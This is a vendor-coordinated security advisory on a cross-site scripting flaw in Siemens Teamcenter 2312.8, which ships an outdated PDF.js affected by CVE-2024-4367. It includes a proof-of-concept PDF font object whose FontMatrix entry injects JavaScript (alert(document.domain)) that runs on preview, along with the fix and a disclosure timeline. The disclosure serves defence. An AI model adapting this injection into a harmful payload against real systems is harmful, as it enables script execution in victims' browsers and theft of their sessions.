usd-2025-37 | Teamcenter 2312.8 - Cross-Site Scripting

Product: Teamcenter
Affected Version: 2312.8
Vulnerability Type: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') (CWE-79)
Security Risk: HIGH
Vendor: Siemens
Vendor URL: https://plm.sw.siemens.com/de-DE/teamcenter/
Vendor acknowledged vulnerability: Yes
Vendor Status: Fixed
CVE Number: CVE-2024-4367
CVE Link: https://nvd.nist.gov/vuln/detail/cve-2024-4367
Advisory ID: usd-2025-37

Description

An outdated software version of PDF.js with known vulnerabilities is in use.

The use of software with known security vulnerabilities represents a security risk, as details on how to exploit these vulnerabilities are often published as well.

As a result, the vulnerable software can be compromised with little effort, even by attackers with limited technical capability.

Proof of Concept

The PDF.js version used in Siemens Teamcenter is vulnerable to CVE-2024-4367 which leads to arbitrary JavaScript execution.
To proof this, the following payload is injected into a malicious PDF document:

alert(document.domain)

In order to make the vulnerability trigger, the payload has to be injected into the FontMatrix property of the PDF:

[...]
<<
/Widths[573 0 582 0 548 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 573 0 573 0 341]
/Type/Font
/BaseFont/PAXEKO+SourceSansPro-Bold
/LastChar 102
/Encoding/WinAnsiEncoding
/FontMatrix [0.1 0 0 0.1 0 (1\);
alert\(document.domain\)
//)]
/Subtype/Type1
/FirstChar 65
/FontDescriptor 9 0 R
>>
[...]

Afterwards, the malicious PDF was uploaded as an attachment in one of the objects:

If the attachment is now displayed in the preview with the PDF.js library, the payload triggers.

Fix

It is recommended to upgrade the vulnerable software PDF.js immediately to the latest stable release.

References

Timeline

  • 2025-07-28: Vulnerabilities initially reported via Siemens' vulnerability handling and disclosure process.
  • 2025-08-20: Siemens report that they could reproduce the findings and are working on a fix.
  • 2026-05-12: Siemens releases a fix and publishes an advisory about the findings, see https://cert-portal.siemens.com/productcert/html/ssa-827383.html
  • 2026-07-14: This advisory is published.

Credits

This security vulnerability was identified by Robin Plugge of usd AG.